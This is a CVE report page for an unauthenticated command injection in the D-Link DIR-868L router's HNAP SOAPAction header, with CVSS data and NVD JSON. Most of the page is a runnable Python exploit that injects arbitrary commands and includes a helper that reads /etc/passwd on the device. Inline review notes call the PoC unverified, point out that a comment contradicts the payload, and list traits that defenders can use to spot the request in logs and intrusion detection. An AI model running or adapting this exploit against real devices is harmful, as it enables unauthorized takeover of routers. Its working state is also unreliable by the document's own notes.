Security Vulnerability Report
CVE-2025-63932 CVSS 7.3 HIGH

CVE-2025-63932

Published: 2025-11-19 20:15:54
Last Modified: 2025-12-11 18:23:31

Description

The D-Link DIR-868L A1 router running firmware FW106KRb01.bin has an unauthenticated remote code execution vulnerability in the cgibin binary. Because the HNAP service provided by cgibin does not filter the HTTP SOAPAction header field, an unauthenticated remote attacker can execute shell commands on the device (OS command injection, CWE-78).

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-868l_firmware:fw106krb01:*:*:*:*:*:*:* - VULNERABLE
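cpe:2.3:h:dlink:dir-868l:a1:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform entry: the NVD configuration joins it to the firmware entry above with an AND operator, so the record applies to this hardware when it runs the listed firmware)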
D-Link DIR-868L A1 固件版本 FW106KRb01.bin

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-63932 PoC - D-Link DIR-868L Unauthenticated RCE via SOAPAction Header
Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-63932

The script sends one HTTP POST to /HNAP1/ and prints the reply. It contains
no logic that decides whether a device is affected, and the page shows no
device output for it.

For log and IDS review, the request built here has these fixed traits:
  * method POST, path /HNAP1/, plain http://
  * a SOAPAction header whose value contains ';' and '#' around the command
    text instead of an action URI
  * User-Agent 'Mozilla/5.0 (compatible; CVE-2025-63932)'
  * header HNAP_AUTH: 1234 and cookie uid=1234567890
"""
import requests
import sys


def exploit_dlink_rce(target_ip, target_port=80, cmd="id"):
    """
    Exploit CVE-2025-63932: Unauthenticated RCE in D-Link DIR-868L HNAP service

    Builds a POST request to http://<target_ip>:<target_port>/HNAP1/ with the
    command text embedded in the SOAPAction header, sends it once, and prints
    the status code, the length of the body and its first 1000 characters.

    Args:
        target_ip: Target router IP address
        target_port: Target router port (default: 80)
        cmd: Command to execute on the target system

    Returns:
        The requests.Response object when the request completes, or None when
        requests raises a RequestException (connection error, timeout, ...).
        The function does not inspect the response, so a returned object does
        not by itself mean the command ran.
    """
    url = f"http://{target_ip}:{target_port}/HNAP1/"

    # Construct malicious SOAPAction header with command injection
    # The HNAP service does not filter the SOAPAction header field
    # Inject command using backticks for command substitution
    # NOTE(review): the string built below contains no backticks; it places
    # cmd between ';' and '#'. Nothing on the page confirms which form the
    # firmware accepts, so treat this PoC as unverified.
    payload = f'{{";{cmd}#}}'

    headers = {
        'SOAPAction': payload,
        'Content-Type': 'text/xml',
        # Fixed, distinctive User-Agent: usable as a log search term.
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-63932)',
        'HNAP_AUTH': '1234',  # Some endpoints may require this header
        'Cookie': 'uid=1234567890'
    }

    # XML payload for HNAP request
    # The body is a static Login request (Username "Admin", empty password)
    # and is the same for every cmd; only the SOAPAction header varies.
    xml_body = '''<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://purenetworks.com/HNAP1/"> <soap:Header> <tns:HNAPAuth xmlns:tns="http://purenetworks.com/HNAP1/">1234</tns:HNAPAuth> </soap:Header> <soap:Body> <tns:Login> <Username>Admin</Username> <LoginPassword></LoginPassword> <Captcha></Captcha> </tns:Login> </soap:Body> </soap:Envelope>'''

    try:
        print(f"[*] Targeting {target_ip}:{target_port}")
        print(f"[*] Executing command: {cmd}")

        # verify=False has no effect here because the URL scheme is http://.
        response = requests.post(url, headers=headers, data=xml_body, timeout=10, verify=False)

        print(f"[+] Response Status: {response.status_code}")
        # len(response.text) counts decoded characters, although the label
        # printed says "bytes".
        print(f"[+] Response Length: {len(response.text)} bytes")
        print(f"\n[+] Response Content:\n{response.text[:1000]}")

        return response

    except requests.exceptions.RequestException as e:
        # Network-level failures are reported and turned into a None return.
        print(f"[-] Error: {e}")
        return None


def check_vulnerability(target_ip, target_port=80):
    """
    Check if target is vulnerable to CVE-2025-63932

    Calls exploit_dlink_rce() with the command "cat /etc/passwd" and discards
    its return value. The function returns None in every case and never
    examines the response, so it produces printed output only, not a
    vulnerable / not-vulnerable verdict. It is not called from the
    __main__ block below.

    Args:
        target_ip: Target router IP address
        target_port: Target router port (default: 80)
    """
    print(f"[*] Checking if {target_ip} is vulnerable...")

    # Try to execute a safe command to verify vulnerability
    # NOTE(review): the command passed here reads /etc/passwd on the device,
    # so this is not a non-intrusive check.
    exploit_dlink_rce(target_ip, target_port, "cat /etc/passwd")


if __name__ == "__main__":
    # Command-line entry point: <target_ip> is required, port and command
    # are optional and default to 80 and "id".
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-63932.py <target_ip> [port] [command]")
        print("Example: python cve-2025-63932.py 192.168.0.1 80 'id'")
        sys.exit(1)

    target = sys.argv[1]
    # int() raises ValueError when the port argument is not numeric; that
    # case is not handled.
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    command = sys.argv[3] if len(sys.argv) > 3 else "id"

    exploit_dlink_rce(target, port, command)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63932", "sourceIdentifier": "[email protected]", "published": "2025-11-19T20:15:53.817", "lastModified": "2025-12-11T18:23:31.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D-Link Router DIR-868L A1 FW106KRb01.bin has an unauthenticated remote code execution vulnerability in the cgibin binary. The HNAP service provided by cgibin does not filter the HTTP SOAPAction header field. The unauthenticated remote attacker can execute the shell command."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-868l_firmware:fw106krb01:*:*:*:*:*:*:*", "matchCriteriaId": "42356994-7EBF-4E6B-A13E-8FFE91DD30CB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": 
"cpe:2.3:h:dlink:dir-868l:a1:*:*:*:*:*:*:*", "matchCriteriaId": "0D8A8303-F830-477F-8944-F1149A0CD521"}]}]}], "references": [{"url": "https://github.com/WhereisRain/DIR-868", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/WhereisRain/DIR-868/tree/main", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.dlink.com/en/security-bulletin/", "source": "[email protected]", "tags": ["Product"]}]}}